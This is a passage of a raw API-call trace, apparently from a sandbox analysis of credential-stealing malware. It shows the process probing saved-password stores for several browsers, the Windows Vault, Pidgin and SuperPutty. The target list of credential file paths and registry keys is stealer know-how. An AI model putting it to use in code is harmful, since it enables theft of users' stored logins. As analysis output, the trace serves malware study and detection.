param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0145.305] GetProcessHeap () returned 0x690000 [0145.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69b0d0 [0145.305] GetProcessHeap () returned 0x690000 [0145.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.307] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0145.307] GetProcessHeap () returned 0x690000 [0145.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b0d0 | out: hHeap=0x690000) returned 1 [0145.308] GetProcessHeap () returned 0x690000 [0145.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8368 [0145.308] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.309] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0145.309] GetProcessHeap () returned 0x690000 [0145.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc2) returned 0x69d918 [0145.309] GetProcessHeap () returned 0x690000 [0145.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.311] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0145.311] GetProcessHeap () returned 0x690000 [0145.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69d918 | out: hHeap=0x690000) returned 1 [0145.312] GetProcessHeap () returned 0x690000 [0145.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8368 [0145.312] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.313] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0145.313] GetProcessHeap () returned 0x690000 [0145.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xbe) returned 0x6ac2f0 [0145.313] GetProcessHeap () returned 0x690000 [0145.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.316] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0145.316] GetProcessHeap () returned 0x690000 [0145.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f0 | out: hHeap=0x690000) returned 1 [0145.316] GetProcessHeap () returned 0x690000 [0145.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8368 [0145.317] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.318] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0145.318] GetProcessHeap () returned 0x690000 [0145.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69a7a0 [0145.318] GetProcessHeap () returned 0x690000 [0145.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.320] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0145.321] GetProcessHeap () returned 0x690000 [0145.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a7a0 | out: hHeap=0x690000) returned 1 [0145.321] GetProcessHeap () returned 0x690000 [0145.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8368 [0145.322] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.323] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0145.323] GetProcessHeap () returned 0x690000 [0145.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xac) returned 0x6ac2e0 [0145.323] GetProcessHeap () returned 0x690000 [0145.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.325] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0145.325] GetProcessHeap () returned 0x690000 [0145.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2e0 | out: hHeap=0x690000) returned 1 [0145.325] GetProcessHeap () returned 0x690000 [0145.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8368 [0145.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.327] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0145.327] GetProcessHeap () returned 0x690000 [0145.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf0) returned 0x6ac2f8 [0145.327] GetProcessHeap () returned 0x690000 [0145.328] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.329] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0145.331] GetProcessHeap () returned 0x690000 [0145.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f8 | out: hHeap=0x690000) returned 1 [0145.332] GetProcessHeap () returned 0x690000 [0145.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8368 [0145.332] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.333] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0145.333] GetProcessHeap () returned 0x690000 [0145.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xec) returned 0x6ac2f0 [0145.333] GetProcessHeap () returned 0x690000 [0145.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.335] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0145.335] GetProcessHeap () returned 0x690000 [0145.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f0 | out: hHeap=0x690000) returned 1 [0145.336] GetProcessHeap () returned 0x690000 [0145.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8368 [0145.336] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.337] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0145.338] GetProcessHeap () returned 0x690000 [0145.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xca) returned 0x6ac2d0 [0145.338] GetProcessHeap () returned 0x690000 [0145.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.339] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0145.339] GetProcessHeap () returned 0x690000 [0145.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2d0 | out: hHeap=0x690000) returned 1 [0145.340] GetProcessHeap () returned 0x690000 [0145.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8368 [0145.340] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.341] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0145.341] GetProcessHeap () returned 0x690000 [0145.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xda) returned 0x6ac2e0 [0145.341] GetProcessHeap () returned 0x690000 [0145.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.343] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0145.343] GetProcessHeap () returned 0x690000 [0145.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2e0 | out: hHeap=0x690000) returned 1 [0145.344] GetProcessHeap () returned 0x690000 [0145.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8368 [0145.344] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.346] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0145.346] GetProcessHeap () returned 0x690000 [0145.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf2) returned 0x6ac2f8 [0145.346] GetProcessHeap () returned 0x690000 [0145.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.348] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0145.348] GetProcessHeap () returned 0x690000 [0145.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f8 | out: hHeap=0x690000) returned 1 [0145.349] GetProcessHeap () returned 0x690000 [0145.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8368 [0145.350] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.350] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0145.350] GetProcessHeap () returned 0x690000 [0145.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xee) returned 0x6ac2f0 [0145.351] GetProcessHeap () returned 0x690000 [0145.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.352] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0145.352] GetProcessHeap () returned 0x690000 [0145.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f0 | out: hHeap=0x690000) returned 1 [0145.353] GetProcessHeap () returned 0x690000 [0145.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8368 [0145.354] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.354] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0145.354] GetProcessHeap () returned 0x690000 [0145.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xcc) returned 0x6ac2d0 [0145.355] GetProcessHeap () returned 0x690000 [0145.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.357] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0145.357] GetProcessHeap () returned 0x690000 [0145.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2d0 | out: hHeap=0x690000) returned 1 [0145.358] GetProcessHeap () returned 0x690000 [0145.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8368 [0145.359] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.360] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0145.360] GetProcessHeap () returned 0x690000 [0145.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xdc) returned 0x6ac2e0 [0145.360] GetProcessHeap () returned 0x690000 [0145.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.361] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0145.362] GetProcessHeap () returned 0x690000 [0145.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2e0 | out: hHeap=0x690000) returned 1 [0145.362] GetProcessHeap () returned 0x690000 [0145.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6a8368 [0145.362] GetProcessHeap () returned 0x690000 [0145.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b578 [0145.362] GetProcessHeap () returned 0x690000 [0145.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x697f98 [0145.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0145.364] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x697f98 | out: phkResult=0x697f98*=0x0) returned 0x2 [0145.364] GetProcessHeap () returned 0x690000 [0145.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x697f98 | out: hHeap=0x690000) returned 1 [0145.364] GetProcessHeap () returned 0x690000 [0145.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.364] GetProcessHeap () returned 0x690000 [0145.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b578 | out: hHeap=0x690000) returned 1 [0145.365] GetProcessHeap () returned 0x690000 [0145.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6a8368 [0145.365] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0145.366] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6a8368 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0145.366] GetProcessHeap () returned 0x690000 [0145.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f94) returned 0x6a8578 [0145.370] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.371] wvsprintfW (in: param_1=0x6a8578, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0145.371] GetProcessHeap () returned 0x690000 [0145.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9a) returned 0x69a650 [0145.371] GetProcessHeap () returned 0x690000 [0145.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8578 | out: hHeap=0x690000) returned 1 [0145.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.372] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0145.373] GetProcessHeap () returned 0x690000 [0145.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a650 | out: hHeap=0x690000) returned 1 [0145.373] GetProcessHeap () returned 0x690000 [0145.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.405] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6cf10000 [0146.270] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultEnumerateItems") returned 0x6cf1b960 [0146.271] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultEnumerateVaults") returned 0x6cf33510 [0146.273] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultFree") returned 0x6cf27050 [0146.274] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultGetItem") returned 0x6cf1bb70 [0146.275] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultGetItem") returned 0x6cf1bb70 [0146.280] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultOpenVault") returned 0x6cf1bc10 [0146.280] GetProcAddress (hModule=0x6cf10000, lpProcName="VaultCloseVault") returned 0x6cf1bc90 [0146.281] GetVersionExW (in: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xbf5eb5f6, dwMinorVersion=0x19fb5c, dwBuildNumber=0x0, dwPlatformId=0x408323, szCSDVersion="ꌈi쾓睉") | out: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0146.281] VaultEnumerateVaults () returned 0x0 [0146.291] GetProcessHeap () returned 0x690000 [0146.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6aa2c8 [0146.291] GetProcessHeap () returned 0x690000 [0146.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b5c0 [0146.291] VaultOpenVault () returned 0x0 [0146.294] VaultEnumerateItems () returned 0x0 [0146.294] VaultFree () returned 0x0 [0146.294] VaultCloseVault () returned 0x6 [0146.296] VaultOpenVault () returned 0x0 [0146.297] VaultEnumerateItems () returned 0x0 [0146.301] VaultFree () returned 0x0 [0146.301] VaultCloseVault () returned 0x6 [0146.301] GetProcessHeap () returned 0x690000 [0146.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.302] GetProcessHeap () returned 0x690000 [0146.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b5c0 | out: hHeap=0x690000) returned 1 [0146.302] GetProcessHeap () returned 0x690000 [0146.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6aa2c8 [0146.302] GetProcessHeap () returned 0x690000 [0146.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b578 [0146.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0146.306] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0x19fbb8 | out: phkResult=0x19fbb8*=0x0) returned 0x2 [0146.306] GetProcessHeap () returned 0x690000 [0146.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.307] GetProcessHeap () returned 0x690000 [0146.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b578 | out: hHeap=0x690000) returned 1 [0146.307] GetProcessHeap () returned 0x690000 [0146.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.308] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.308] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0146.308] GetProcessHeap () returned 0x690000 [0146.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f50) returned 0x6aaaf0 [0146.321] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.322] wvsprintfW (in: param_1=0x6aaaf0, param_2="%s\\Opera", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0146.322] GetProcessHeap () returned 0x690000 [0146.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5a) returned 0x6a8f68 [0146.322] GetProcessHeap () returned 0x690000 [0146.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aaaf0 | out: hHeap=0x690000) returned 1 [0146.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.324] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0146.324] GetProcessHeap () returned 0x690000 [0146.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.324] GetProcessHeap () returned 0x690000 [0146.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8f68 | out: hHeap=0x690000) returned 1 [0146.325] GetProcessHeap () returned 0x690000 [0146.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0146.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.329] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fba4*=0x104) returned 0x2 [0146.329] GetProcessHeap () returned 0x690000 [0146.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.329] GetProcessHeap () returned 0x690000 [0146.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0146.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.331] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fba4*=0x104) returned 0x2 [0146.331] GetProcessHeap () returned 0x690000 [0146.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.331] GetProcessHeap () returned 0x690000 [0146.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0146.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.332] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fba4*=0x104) returned 0x2 [0146.333] GetProcessHeap () returned 0x690000 [0146.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.333] GetProcessHeap () returned 0x690000 [0146.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6aa2c8 [0146.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.334] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb90*=0x104 | out: pdwType=0x0, pvData=0x6aa2c8, pcbData=0x19fb90*=0x104) returned 0x2 [0146.334] GetProcessHeap () returned 0x690000 [0146.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.350] GetProcessHeap () returned 0x690000 [0146.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6aaaf0 [0146.351] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.352] wvsprintfW (in: param_1=0x6aaaf0, param_2="%s\\.purple\\accounts.xml", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0146.352] GetProcessHeap () returned 0x690000 [0146.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x78) returned 0x6a7770 [0146.352] GetProcessHeap () returned 0x690000 [0146.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aaaf0 | out: hHeap=0x690000) returned 1 [0146.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.354] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0146.354] GetProcessHeap () returned 0x690000 [0146.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7770 | out: hHeap=0x690000) returned 1 [0146.376] GetProcessHeap () returned 0x690000 [0146.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.377] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.378] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0146.380] GetProcessHeap () returned 0x690000 [0146.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5a) returned 0x6ab2f8 [0146.383] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.385] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\SuperPutty", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0146.385] GetProcessHeap () returned 0x690000 [0146.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x58) returned 